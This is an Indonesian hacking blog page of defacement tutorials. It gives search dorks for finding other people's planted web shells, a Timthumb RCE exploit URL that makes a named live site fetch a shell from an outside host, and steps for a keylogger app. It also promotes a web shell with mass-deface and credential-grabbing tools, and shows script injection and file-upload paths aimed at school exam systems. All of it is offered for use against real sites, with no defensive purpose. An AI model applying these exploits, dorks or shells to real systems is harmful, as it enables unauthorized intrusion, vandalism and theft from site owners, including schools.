Postingan

Menampilkan postingan dari Juni, 2020

Deface Dengan Dorking Shell Backdoor

Gambar
Hallo, first post tutorial menikung shell backdoor orang, oke langsung ke tutorialnya aja :)



Dork :
       intitle:sh3ll ext:php "/public_html/"       intitle:"IndoXploit" filetype:php        intitle:"IndoXploit" intext:"public_html" filetype:php       intitle:"IndoXploit" intext:"mass deface" filetype:php       intitle:"IndoXploit" intext:"mass delete" filetype:php       intitle:"IndoXploit" intext:"config" filetype:php       intitle:"IndoXploit" intext:"config" filetype:php       intitle:"IndoXploit" intext:"fake root" filetype:php       intitle:"IndoXploit" intext:"auto edit user" filetype:php       intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php       intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php       intitle:"IndoXploit" intext:"W…

Cara deface dengan Exploit Timthumb V1.XX RCE

Gambar
Hello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE
yuk langsung saja ke tutorialnya,


Dork : inurl:/timthumb.php 
atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini
Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php


Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php
Untuk ciri ciri web vuln rce timthumb seperti gambar dibawah ini .

jika sudah menemukan website yang seperti itu kita langsung saja exploit seperti ini  http://cityfordhcm.com/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php nanti akan keluarseperti gambar dibawah ini atau seperti ini

Cara Menjalankan Hackers Keylogger

Gambar
Hackers KeyLogger Adalah Aplikasi Keylogger Yang Merekam Semua Data Yang Diketik Di Keyboard Tersebut
Size Hackers KeyLogger : 1.99MB
Link Download : Here
Cara Mengaktifkan :
Download Aplikasinya Lalu Install & Buka, Lalu Klik Seperti Ini Pilih Choose Keyboard Switch On Hack Keyboard Kembali Lagi Ke Aplikasi Hackers KeyLoggerPilih Hack Keyboard Tekan Tombol Yang Merah Hingga HijauDan Keyloggernya Sudah Jalan :)Cara Buka Lognya : Buka Aplikasi KeyLoggernyaKlik Open ApplicationKlik Typed DataDoneSelamat Mencoba Label: 

AndoXShell

Gambar
Shell ini gua buat dari Beberapa tools shell yang sudah ada sebelumnya seperti dari shell IndoXploit - Xaisyndicate - Ustadcage48 - Mrxbarakuda :v

Alasan : karna banyak sekali shell backdoor yg support pc tapi gak buat android,kalo di pakek di android ya otomatis harus zoom in - zoom out kadang kadang suka salah pencet,pencet rename malah kepencet delete :'v

ya pokok nya shell ini gua buat udah semaksimal mungkin,jadi maaf kalo seandainya masih banyak kekurangan di sana sini,yang pasti shell ini 100% Smooth udah gua pakek di Chrome dan Uc Browser,Kalo mau yg lebih smooth gua saranin pkek chrome tapi terserah lu dah :v

Halaman Login


Tools

- Adminer
- Command
- Jumping
- Symlink
- Symlink Python
- Mass Deface
- Config v2
- Config Grabber
- Auto edit user
- Auto edit user WP
- Cpanel Crack
- Safety
- Zone-H

Penampakan nya

Tutorial Deface Poc JSO

Gambar
assalamualaikum wr.wbkali ini saya akan membagikan tutorial deface metode JSObahan bahannya :-SCRIPT JSO-KESABARAN-APK BROWSER SEPERTI CHROME– DORK : aplikasi sistem informasi kelulusanPERTAMA TAMA KITA DORKING DULU DI CHROME “aplikasi sistem informasi kelulusan”PILIH TARGET KALIANKALIAN PILIH “HUBUNGI KAMI”DI KOLOM NAMA ISI NICK KALIAN,DI EMAIL ISI NGASAL AJA CONTOH : noahklak@gmail.com,DI KOLOM PESAN ISI DENGAN SCRIPT JSO KALIAN CONTOH :NAH KALIAN BISA LIHATKAN, KALAU SUDAH KALIAN KLICK KIRIM PESANJIKA ADA TULISAN DATA BERHASIL DI KIRIM KITA TINGGAL PANGGIL SCRIPT JSO KITA TADI DENGAN CARA : http://website.sch.id/kelulusanxyz-a/admin/hubungi.phpTINGGAL KALIAN ENTER DAN DONEDAN SELESAI“SELAMAT MENCOBA^_^”

TUTORIAL DEFACE POC DNS HIJACKING

Gambar
assalamualaikum wr wb…
welcombek mek
kali ini gw bakal kasih tutorial deface poc dns hijackingbahan” yang kalian butuhkan :
1.sc deface
2.kopi buat santuy
3.apk browser gw saranin pakek crhome yelangsung aja gass
kita masuk dulu web klick di sinitrus kalian login pakek akun google kaliannah kalau dah masuk nanti pasti ada iklannya suruh masukin password apalah itu…kalian pilih (×) trus sampai laman biasakalian pilih domain managerabis itu kalian pilih buat domain gratis/add free domainnah di aitu kalian buat domain kalian sendiri kalai udah buat…kalian cari file manager pilih domain kalian..dan pilih upload script deface kaliankalau udh upload kalian copy link website kalian dan kalian pastekan di web baruNOTE : KALAU MAU TEBAS INDEXNYA KALIAN UBAH NAMA SCRIPT DEFACE KALIAN JADI “index.php”

Deface Poc CBT

Gambar
Assalamualaikum Brother... :v


Kali Ini gw akan Ngasih Tutor, Gimana sih cara Deface CBT atau bisa dibilang Computer Based Test.. Nahh nih gw kasih sedikit tutor buat kalian semua....
yang pertama siapin Dork

Dork :

inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart

Exploit :

/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php

CSRF : Klik Disini

Pertama kita dorking dulu...